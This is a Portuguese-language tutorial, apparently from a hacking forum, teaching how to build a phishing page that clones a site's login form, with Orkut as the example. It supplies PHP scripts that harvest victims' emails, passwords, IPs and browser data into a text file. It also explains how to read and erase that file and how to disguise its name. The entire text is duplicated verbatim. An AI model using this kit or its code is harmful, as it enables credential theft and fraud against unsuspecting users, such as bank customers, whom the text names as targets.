Esse tutorial vai te ensinar a criar uma página fake de qualquer site!
Para aqueles que não sabem o que é uma página fake…
Página fake é uma página falsa de login de um site, que rouba os dados das pessoas. Como por exemplo uma página fake de login de um banco (que possui a fução de roubar a senha dos usuários do banco).
Nossa pagina fake funciona da seguinte maneira:
1º – Você vai precisar de um arquivo HTML (o login.html) e mais alguns arquivos PHP
salva.php
apagar.php
ler.php
Você vai upar todos os arquivos em um host free [[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] e quando a vítima logar na página fake, os seus dados serão salvos em um arquivo “senhas.txt” no próprio host!
Para ver esse arquivo, acesse o arquivo ler.php. E para apagar, acesse o arquivo apagar.php!
Vamos lá! Primeiramente, entre na página de login de algum site (vamos pegar o Orkut como exemplo) e salve o html como login.html!
Agora, entre no bloco de notas e crie os PHP’s:
salva.php:
$nomearquivo =”senhas.txt”;
$email =$_POST["VALOR DO INPUT DE LOGIN"];
$senha =$_POST["VALOR DO INPUT DE SENHA"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$ip =$_SERVER['REMOTE_ADDR'];
$hostname =gethostbyaddr($ip);
$data =date(“Y-m-d”);
$hora =date(“H:i:s”);
$traco =”
”;
$ess =”Email: “.$email.”
Senha: “.$senha.”
Navegador: “.$browser.”
IP: “.$ip.”
Nome do Host: “.$hostname.”
Data: “.$data.”
Hora: “.$hora.”
”.$traco;
$abre =@fopen(“senhas.txt”,”a “);
$escreve =fwrite($abre, $ess);
echo “”;
?>
apagar.php:
$fd = @fopen(“senhas.txt”,”w”) or die(“arquivo inexistente”);
fpassthru($fd);
?>
ler.php:
$fd = @fopen(“senhas.txt”,”r”) or die(“Falta um arquivo no servidor!!”);
fpassthru($fd);
?>
Agora, abra login.html com um editor de HTML, ou com o próprio bloco de notas, e ache o form de login. Esse form é um código que, geralmente, vem nos botões de “Entrar” ou “Login”, que dá um endereço pra página ser redirecionada após o login (se o login for autenticado, ou seja, se o usuário e a senha estiverem certos). Geralmente, ele está escrito no seguinte código:
O endereço do Action muda de acordo com o site. Quando for assim, adicione um “Salva.php” no action!
Dica: O form quase sempre vem seguido do “Action”, que significa uma ação que irá acontecer quando clicar no botão (ou quando a página for atualizada). Então, para achar o form de login, aperta Ctrl F e procura por “Action” no código fonte. Quando você ver que achou o form de login, você substitui o endereço do Action por salva.php. Em geral, é assim, mas em alguns casos, em vez de action, tem outros códigos (um deles é OnClick), mas fica fácil de achar, é so pesquisar bastante no código fonte.
No caso do Orkut, no código-fonte, o form está assim:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
-É só você trocar por:
-Agora você procura, por perto do form, a parte do INPUT. Procura o INPUT de usuário e o INPUT de senha. O INPUT é o campo onde você digita a senha. Dica: a maioria dos inputs estao com type=HIDDEN (escondidos). Então, o INPUT que você vai procurar é o de inserir senha e login. Geralmente eles tem nome de LOGIN e PASSWORD. No código-fonte da página de login do Orkut é assim:
e
Agora você pega os valores dos “input name”, que no exemplo, é “username” e “password”, abre o salva.php. Ele deve estar assim:
$nomearquivo =”senhas.txt”;
$email =$_POST["VALOR DO INPUT DE LOGIN"];
$senha =$_POST["VALOR DO INPUT DE SENHA"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$ip =$_SERVER['REMOTE_ADDR'];
$hostname =gethostbyaddr($ip);
$data =date(“Y-m-d”);
$hora =date(“H:i:s”);
$traco =”
”;
$ess =”Email: “.$email.”
Senha: “.$senha.”
Navegador: “.$browser.”
IP: “.$ip.”
Nome do Host: “.$hostname.”
Data: “.$data.”
Hora: “.$hora.”
”.$traco;
$abre =@fopen(“senhas.txt”,”a “);
$escreve =fwrite($abre, $ess);
echo “”;
?>
Agora, você coloca na 2º e na 3º linha, entre aspas, os valores e na penúltima linha, coloque endereço do login Vai ficar assim:
$nomearquivo =”senhas.txt”;
$email =$_POST["Email"];
$senha =$_POST["passwd"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$ip =$_SERVER['REMOTE_ADDR'];
$hostname =gethostbyaddr($ip);
$data =date(“Y-m-d”);
$hora =date(“H:i:s”);
$traco =”
”;
$ess =”Email: “.$email.”
Senha: “.$senha.”
Navegador: “.$browser.”
IP: “.$ip.”
Nome do Host: “.$hostname.”
Data: “.$data.”
Hora: “.$hora.”
”.$traco;
$abre =@fopen(“senhas.txt”,”a “);
$escreve =fwrite($abre, $ess);
echo “”;
?>
Salve e pronto!
Agora você precisa saber a função de cada arquivo:
-> login.htm: a página fake já com as modificações necessárias
-> login_arquivos: imagens (geralmente, gifs e pngs) da página de login
-> salva.php: arquivo php necessário pra página funcionar (salva senhas e logins no arquivo senhas.txt)
-> ler.php: com esse arquivo é que você vai conseguir ver as senhas e logins (permite você visualizar o arquivo senhas.txt)
-> apagar.php: com esse arquivo, você vai apagar as senhas e logins depois de ter guardado (apaga o arquivo senhas.txt)
-> senhas.txt: o arquivo com as senhas que vâo ser salvas depois de alguem ter logado na página fake. Se você quiser dificultar o acesso de outras pessoas à sua página fake, mude “senhas.txt” e “ler.php”, como por exemplo hell.php e hell.txt. Fica mais difícil de uma pessoa descobrir o link do log de senhas. Mas, para fazer isso, você vai ter que mudar o nome em todos os lugares, em todos phps e na página fake, que fazem referência à Salvar.txt e Ler.php.
IMPORTANTE: Coloque todos os 4 arquivos juntos no mesmo diretório
IMPORTANTE²: Crie uma pasta no diretorio onde vc fez o upload dos 4 arquivos e faça o upload dos arquivos que estao dentro da pasta login_Arquivos. Pronto
Para aqueles que não sabem o que é uma página fake…
Página fake é uma página falsa de login de um site, que rouba os dados das pessoas. Como por exemplo uma página fake de login de um banco (que possui a fução de roubar a senha dos usuários do banco).
Nossa pagina fake funciona da seguinte maneira:
1º – Você vai precisar de um arquivo HTML (o login.html) e mais alguns arquivos PHP
salva.php
apagar.php
ler.php
Você vai upar todos os arquivos em um host free [[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] e quando a vítima logar na página fake, os seus dados serão salvos em um arquivo “senhas.txt” no próprio host!
Para ver esse arquivo, acesse o arquivo ler.php. E para apagar, acesse o arquivo apagar.php!
Vamos lá! Primeiramente, entre na página de login de algum site (vamos pegar o Orkut como exemplo) e salve o html como login.html!
Agora, entre no bloco de notas e crie os PHP’s:
salva.php:
$nomearquivo =”senhas.txt”;
$email =$_POST["VALOR DO INPUT DE LOGIN"];
$senha =$_POST["VALOR DO INPUT DE SENHA"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$ip =$_SERVER['REMOTE_ADDR'];
$hostname =gethostbyaddr($ip);
$data =date(“Y-m-d”);
$hora =date(“H:i:s”);
$traco =”
”;
$ess =”Email: “.$email.”
Senha: “.$senha.”
Navegador: “.$browser.”
IP: “.$ip.”
Nome do Host: “.$hostname.”
Data: “.$data.”
Hora: “.$hora.”
”.$traco;
$abre =@fopen(“senhas.txt”,”a “);
$escreve =fwrite($abre, $ess);
echo “”;
?>
apagar.php:
$fd = @fopen(“senhas.txt”,”w”) or die(“arquivo inexistente”);
fpassthru($fd);
?>
ler.php:
$fd = @fopen(“senhas.txt”,”r”) or die(“Falta um arquivo no servidor!!”);
fpassthru($fd);
?>
Agora, abra login.html com um editor de HTML, ou com o próprio bloco de notas, e ache o form de login. Esse form é um código que, geralmente, vem nos botões de “Entrar” ou “Login”, que dá um endereço pra página ser redirecionada após o login (se o login for autenticado, ou seja, se o usuário e a senha estiverem certos). Geralmente, ele está escrito no seguinte código:
O endereço do Action muda de acordo com o site. Quando for assim, adicione um “Salva.php” no action!
Dica: O form quase sempre vem seguido do “Action”, que significa uma ação que irá acontecer quando clicar no botão (ou quando a página for atualizada). Então, para achar o form de login, aperta Ctrl F e procura por “Action” no código fonte. Quando você ver que achou o form de login, você substitui o endereço do Action por salva.php. Em geral, é assim, mas em alguns casos, em vez de action, tem outros códigos (um deles é OnClick), mas fica fácil de achar, é so pesquisar bastante no código fonte.
No caso do Orkut, no código-fonte, o form está assim:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
-É só você trocar por:
-Agora você procura, por perto do form, a parte do INPUT. Procura o INPUT de usuário e o INPUT de senha. O INPUT é o campo onde você digita a senha. Dica: a maioria dos inputs estao com type=HIDDEN (escondidos). Então, o INPUT que você vai procurar é o de inserir senha e login. Geralmente eles tem nome de LOGIN e PASSWORD. No código-fonte da página de login do Orkut é assim:
e
Agora você pega os valores dos “input name”, que no exemplo, é “username” e “password”, abre o salva.php. Ele deve estar assim:
$nomearquivo =”senhas.txt”;
$email =$_POST["VALOR DO INPUT DE LOGIN"];
$senha =$_POST["VALOR DO INPUT DE SENHA"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$ip =$_SERVER['REMOTE_ADDR'];
$hostname =gethostbyaddr($ip);
$data =date(“Y-m-d”);
$hora =date(“H:i:s”);
$traco =”
”;
$ess =”Email: “.$email.”
Senha: “.$senha.”
Navegador: “.$browser.”
IP: “.$ip.”
Nome do Host: “.$hostname.”
Data: “.$data.”
Hora: “.$hora.”
”.$traco;
$abre =@fopen(“senhas.txt”,”a “);
$escreve =fwrite($abre, $ess);
echo “”;
?>
Agora, você coloca na 2º e na 3º linha, entre aspas, os valores e na penúltima linha, coloque endereço do login Vai ficar assim:
$nomearquivo =”senhas.txt”;
$email =$_POST["Email"];
$senha =$_POST["passwd"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$ip =$_SERVER['REMOTE_ADDR'];
$hostname =gethostbyaddr($ip);
$data =date(“Y-m-d”);
$hora =date(“H:i:s”);
$traco =”
”;
$ess =”Email: “.$email.”
Senha: “.$senha.”
Navegador: “.$browser.”
IP: “.$ip.”
Nome do Host: “.$hostname.”
Data: “.$data.”
Hora: “.$hora.”
”.$traco;
$abre =@fopen(“senhas.txt”,”a “);
$escreve =fwrite($abre, $ess);
echo “”;
?>
Salve e pronto!
Agora você precisa saber a função de cada arquivo:
-> login.htm: a página fake já com as modificações necessárias
-> login_arquivos: imagens (geralmente, gifs e pngs) da página de login
-> salva.php: arquivo php necessário pra página funcionar (salva senhas e logins no arquivo senhas.txt)
-> ler.php: com esse arquivo é que você vai conseguir ver as senhas e logins (permite você visualizar o arquivo senhas.txt)
-> apagar.php: com esse arquivo, você vai apagar as senhas e logins depois de ter guardado (apaga o arquivo senhas.txt)
-> senhas.txt: o arquivo com as senhas que vâo ser salvas depois de alguem ter logado na página fake. Se você quiser dificultar o acesso de outras pessoas à sua página fake, mude “senhas.txt” e “ler.php”, como por exemplo hell.php e hell.txt. Fica mais difícil de uma pessoa descobrir o link do log de senhas. Mas, para fazer isso, você vai ter que mudar o nome em todos os lugares, em todos phps e na página fake, que fazem referência à Salvar.txt e Ler.php.
IMPORTANTE: Coloque todos os 4 arquivos juntos no mesmo diretório
IMPORTANTE²: Crie uma pasta no diretorio onde vc fez o upload dos 4 arquivos e faça o upload dos arquivos que estao dentro da pasta login_Arquivos. Pronto